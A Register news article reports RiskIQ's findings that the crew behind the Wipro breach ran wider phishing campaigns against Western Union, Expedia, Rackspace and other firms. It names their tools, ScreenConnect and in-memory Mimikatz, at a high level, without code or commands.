Wipro wasn't a one-off: Same hacking crew targeted scores of firms, big and small – researchers

Thanks in large part to a counter-phishing product. Doh!

The criminals behind the Wipro phishing attack from earlier this year also targeted Western Union, Expedia, Rackspace and a whole host of other big companies, according to threat intel outfit RiskIQ.

In a report published this morning the firm said the Wipro attackers were running a much larger series of phishing campaigns, aimed at extracting cash from hapless businesses whose files had been forcibly encrypted.

Indian outsourcing behemoth Wipro discovered earlier this year that its email systems had been compromised, seemingly for some time, by black hats using it as a jumping-off point to target Wipro customers.

Indian outsourcing giant Wipro confirms flushing phishers from systems


RiskIQ said it had “identified at least five distinct attack campaigns based off analysis of the actor-owned infrastructure,” having analysed “both Passive DNS and SSL certificate data”.

Targeted companies included Western Union, Moneygram, Rackspace, Capgemini, Wipro, Staples, Costco, Expedia, Virgin Pulse, Messagelab and Sendgrid.

A reasonably sophisticated group* with some knowledge of how to cover their traces were behind the attacks – and were said to have used off-the-shelf phishing templates to compromise the Indian outsourcer, as well as hitting a number of other companies.

Those templates appeared to have been drawn from a counter-phishing training product marketed by Swiss pentesting firm Lucy Security – though Lucy has strenuously denied to The Register that one of its software products was used in the Wipro compromise.

Templates from a Lucy counter-phishing training product were identical to those used by the Wipro attackers, according to RiskIQ, which said in its report: "Lucy comes with a variety of default phishing templates, and one of these templates was used during most of the phishing campaigns – including the now notorious Wipro case."

"There is no evidence that [the hackers] used Lucy software, other than using the template design, and our analysis demonstrates significant evidence to the contrary," said Colin Bastable, chief exec of Lucy Security. FireEye, which also investigated the group behind the Wipro hack following infosec journalist Brian Krebs' work to reveal it in the first place, concurred with Bastable in that Lucy's software itself did not appear to have been used by the crims.

FireEye's CTO of strategic services, Charles Carmakal, told The Register: "The actor commonly uses public or commercially available tools that may already exist in victim environments, such as ScreenConnect, EMCO Remote Installer, CleverControl, Teramind, and Kaseya, to maintain persistence and move laterally."

Powershell and Mimikatz

The Wipro attackers first appeared in May 2016, according to RiskIQ, and went in four distinct waves, mainly targeting services-based businesses such as digital marketing agencies, IT firms, point-of-sale and payment transfer companies and gift card providers. Later waves of attacks retargeted some of the same companies, though each wave saw around 20 to 25 separate businesses being phished.

Those phishing pages were online for just a couple of days – long enough for targeted victims to see the pages but short enough, so the attackers hoped, to evade detection and takedown.

Having phished their way into the target company, the attackers would then deploy and use the Screenconnect remote control tool, as well as the EMCO Remote Installer. Once Screenconnect was in place on a machine inside the target, the hackers then ran "small PowerShell scripts to rename the ScreenConnect product name on compromised machines."

That Powershell script, named Babysharkpro by the criminals, would also execute a custom Mimikatz build in memory, which would dump the credentials of recently logged-in users on that particular device. Mimikatz is rather popular at the moment among black hats, as a number of telcos around the world recently found out the hard way.

"The fact that it was custom-compiled makes it an interesting sample – it does not ever hit the filesystem, as it is executed in memory only," commented RiskIQ.

RiskIQ's previous research includes a plausible explanation for the British Airways hack (compromised JS on the airline's credit card payment page) as well as detailed tracking of miscreants using the Magecart malware. ®


* Although RiskIQ named what appeared to be two individuals it had identified from Whois records linked to domains used to host early iterations of their ransomware's command-and-control infrastructure, El Reg has decided not to reproduce those names or details. There is, after all, little to suggest that those identities themselves hadn't been stolen by the criminals.

Send us news

Decentralized IPFS networks forming the 'hotbed of phishing'

P2P file system makes it more difficult to detect and take down malicious content

Cyber-mercenaries for hire represent shifting criminal business model

Emerging threat group offers a broad range of attack services

This big phish can swim around MFA, says Microsoft Security

Slippery AiTM attacks targeted more than 10,000 orgs over the past nine months

Is this you in this explicit snap? No, it's just Discord phishing

Unless you're Hunter Biden, that compromising pic isn't real

AstraLocker ransomware reportedly closes doors to pursue cryptojacking

Why go through the hassle of demands and decryption when quietly mining is so much easier?

Carnival Cruises torpedoed by US states, agrees to pay $6m after wave of cyberattacks

Now those are some phishing boats

Voicemail phishing emails steal Microsoft credentials

As always, check that O365 login page is actually O365

Europol arrests nine suspected of stealing 'several million' euros via phishing

Victims lured into handing over online banking logins, police say

Zscaler bulks up AI, cloud, IoT in its zero-trust systems

Focus emerges on workload security during its Zenith 2022 shindig

Facebook phishing campaign nets millions in IDs and cash

Hundreds of millions of stolen credentials and a cool $59 million

Interpol anti-fraud operation busts call centers behind business email scams

1,770 premises raided, 2,000 arrested, $50m seized

Heineken says there’s no free beer, warns of phishing scam

WhatsApp messages possibly the worst Father's Day present in the world